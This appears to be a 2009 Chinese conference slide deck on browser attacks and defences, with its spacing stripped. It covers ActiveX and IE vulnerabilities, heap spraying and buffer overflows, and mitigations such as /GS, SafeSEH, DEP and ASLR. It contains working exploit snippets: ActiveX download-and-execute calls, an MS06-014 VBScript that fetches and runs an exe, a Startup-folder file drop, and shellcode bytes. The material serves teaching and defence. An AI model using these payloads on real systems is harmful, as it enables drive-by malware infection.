浅谈浏览器的攻击与范围课件

51CTO安全技术沙龙浅谈浏览器的攻击与防护2009-4-25浏览器安全形势系统本身漏洞减少，第三方漏洞增加浏览器成为攻击的主要目标中国电脑用户受到的基于浏览器的攻击次数高居全球之首360安全卫士日拦截千万次网站挂马攻击(2009年3月数据）2009年2月10日、2月19日、3月11日页面访问量每天接近100万4月21日辽宁电信持续超过60小时瑞丽女性3月22日日访问量350万左右大量政府网站和高校网站被挂马攻击的危害恶作剧帐号被盗首页被改被黑客控制虚拟货币转帐用户的身份资料修改、盗取短消息，EMAIL、SPAM等等浏览器攻击类型浏览器自身缺陷XML0dayMS08078、DataSpaceMS06014第三方插件漏洞Flash、超星、BaiduBar第三方软件漏洞Realplayer、PDFReader脚本漏洞:不会重点讲述XSS、CSRF不仅是IE受到攻击IE、FF、ChromeMaxthon、TT、TheworldWinRAR路由器CSRF手机浏览器漏洞的利用方式利用COM组件自身的缺陷功能利用堆喷射方式攻击的溢出漏洞利用COM组件传递溢出参数到本地软件IE浏览器自身跨域脚本型漏洞特殊的第三方软件的文件格式溢出COM自身漏洞1百度Bar漏洞BaiduBar.dll（44）DloadDS函数提供三个参数，分别是url地址，执行文件名，和是否显示。当url以.cab结尾时，搜霸会下载此文件到临时目录，随后以exe方式执行。obj.DloadDS("http::///xxx.exe","bd.exe",0);COM自身漏洞2UUSEEUUUpgrade.ocx2<objectclassid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B'id='target'></object><scriptlanguage='vbscript'>arg1="/../../ProgramFiles/CommonFiles/uusee/exp.ini"arg2="/UUUpgrade.ini"arg3="fool"arg4=1target.Updatearg1,arg2,arg3,arg4</script>COM自身漏洞3SnapshotViewer任意文件下载漏洞(MS08-041)

<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='obj'></object>

<scriptlanguage='javascript'>varbuf1='/xxx.exe';varbuf2='C:/DocumentsandSettings/AllUsers/「开始」菜单/程序/启动/test.exe';obj.SnapshotPath=buf1;obj.CompressedPath=buf2;obj.PrintSnapshot();</script></html>ldap://c:/ProgramFiles/OutlookExpress/wab.exe堆喷射攻击缓冲区溢出#include<string.h>voidtest(char*in){charbuf[8]={0};strcpy(buf,in);}voidmain(){charaaa[]=“12345678“"\x12\x45\xfa\x7f"//JMPESP"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x48\x49""\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a"............."\x48\x7a\x38\x4b\x4e\x4e\x6a\x36\x6e\x41\x47\x6b\x4f\x38\x67\x70""\x63\x42\x41\x30\x6c\x51\x73\x33\x30\x4a";test(aaa);}示例程序堆喷射攻击用JavaScript脚本创建了很多个string对象，在string对象中写入一个长长的NOP链以及紧接着NOP链的一小段shellcode。JavaScriptruntime会把这些string对象都存储在堆中。由于堆中的数据是不断向内存高址增长的。在大约分配了200MB的内存给这些string对象之后，在50MB～200MB这段内存中，随意取出一个地址，上面写着的很可能就是NOP链中的一环。把某个返回地址覆盖掉，变成这个随意取出的地址之后，我们就能跳到这个NOP链上，最终执行Shellcode。堆喷射攻击用同样的一个指令，去覆盖一片大内存地址，在每块分配到的内存最后，都付上我们的shellcode。

0B2701B0

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................0B2701C0

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................0B2701D0

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................

0x0c0c0c0c的地址的内容也是0c0c0c0c、

0C0C0C0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................0C0C0C1C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................0C0C0C2C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

0C

................

0C0C0C0C

0C

0C

OR

AL,0C0C0C0C0E

0C

0C

OR

AL,0C0C0C0C10

0C

0C

OR

AL,0C0C0C0C12

0C

0C

OR

AL,0C控制eip寄存器指向了0x0c0c0c0c这个地址，就会一直在这片内存中执行下去，一直执行到我们的shellcode为止。堆喷射攻击暴风影音联众超星阅读器讯雷REALPAY(rmoc3260.dll)MS07-004（VML溢出）MS08-078（IE7XML）第三方软件漏洞REALPAY

IMPORT漏洞RealPlayer的rjbdll.dll模块没有正确地删除媒体库文件，如果用户使用ActiveX控件{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}将有漏洞的文件导入到用户的媒体库的话，则在删除该文件时就会触发栈溢出，导致执行任意指令。浏览器自身跨域漏洞MS06-014<scriptlanguage="VBScript">onerrorresumenextSetdf=document.createElement("object")df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"Setx=df.CreateObject("Microsoft.XMLHTTP","")setS=df.createobject("Adodb.Stream","")S.type=1x.Open"GET","/xxx.exe",Falsex.SendsetF=df.createobject("Scripting.FileSystemObject","")settmp=F.GetSpecialFolder(2)setfname1=F.BuildPath(tmp,"xxx.exe")S.openS.writex.responseBodyS.savetofilefname1,2S.closesetQ=df.createobject("Shell.Application","")Q.ShellExecutefname1,"","","open",0</script>第三方软件的格式溢出Flash9AdobeFlashPlayer<IE/FF通用超大的ShellCode缓冲区安全性检查/GS--缓冲区安全性检查如果使用/GS进行编译，将在程序中插入代码，以检测可能覆盖函数返回地址的缓冲区溢出。如果发生了缓冲区溢出，系统将向用户显示一个警告对话框，然后终止程序。这样，攻击者将无法控制应用程序。SafeSEH堆栈溢出在的Windows系统中一直都是安全问题的核心，其中覆盖SEH的技术早为人熟知。SafeSEH是一项保护和检测和防止堆栈中的SEH被覆盖而导致利用的技术。SafeSEH在XPSP2上就提供，但在Vista下才正式开始发挥威力。SafeSEH在编译器生成二进制IMAGE的时候，把所有合法的SEH函数的地址解析出来，在IMAGE里生成一张合法的SEH函数表，用于异常处理时候进行严格的匹配检查。加载IMAGE时，定位和读出合法SEH函数表的地址（如果该IMAGE是不支持SafeSEH的，则这个SEH函数表的地址为0），使用shareuser内存中的一个随机数加密。将加密的SEH函数表的加密地址，IMAGE的开始地址，IMAGE的长度，合法SEH函数的个数作为一条记录放入ntdll的加载模块数据内存中。SafeSEH异常处理时根据堆栈中SEH的地址，确认是否属于一个IMAGE的地址空间。如果属于读取ntdll的加载模块数据内存对应的“SEH函数表的加密地址，IMAGE的开始地址，IMAGE的长度，合法SEH函数的个数”记录读出shareuser内存中的一个随机数，解密SEH函数表的加密地址，读出真实的SEH函数表地址。如果该地址不为0，代表该IMAGE支持safeseh根据合法SEH函数的个数，依次计算合法合法SEH函数的地址并和当前SEH地址进行比较，如果符合执行SEH函数，如果全不符合则不执行当前SEH指定的地址，跳出不执行如果该地址为0，代表该IMAGE不支持safeseh，只要该内存属于该IMAGE.code范围内的代码都可以执行数据执行保护数据执行保护(DEP)是一套软硬件技术，能够在内存上执行额外检查以帮助防止在系统上运行恶意代码。在MicrosoftWindowsXPServicePack2、MicrosoftWindowsServer2003ServicePack1、MicrosoftWindowsXPTabletPCEdition2005和MicrosoftWindowsVista中，由硬件和软件一起强制实施DEP。

DEP的主要优点是可以帮助防止数据页执行代码。通常情况下，不从默认堆和堆栈执行代码。硬件实施DEP检测从这些位置运行的代码，并在发现执行情况时引发异常。软件实施DEP可帮助阻止恶意代码利用Windows中的异常处理机制进行破坏。

硬件实施DEP是某些DEP兼容处理器的功能，可以防止在已标记为数据存储区的内存区域中执行代码。此功能也称为非执行和执行保护。WindowsXPSP2还包括软件实施DEP，其目的在于减少利用Windows中的例外处理机制的情况。地址空间随机加载WindowsVista中包含有一种旨在保护系统免受缓冲区溢出攻击的安全功能:AddressSpaceLayoutRandomization（ASLR）的该功能会将关键的系统文件加载到不同的内存地址，提高了恶意代码运行的难度。打上所有补丁补丁的重要性操作系统补丁第三方补丁使用360安全卫士来打补丁更准确的检测更快速、更方便、更安全修正补丁打不上的问题URL拦截XSS、CSRF基于URL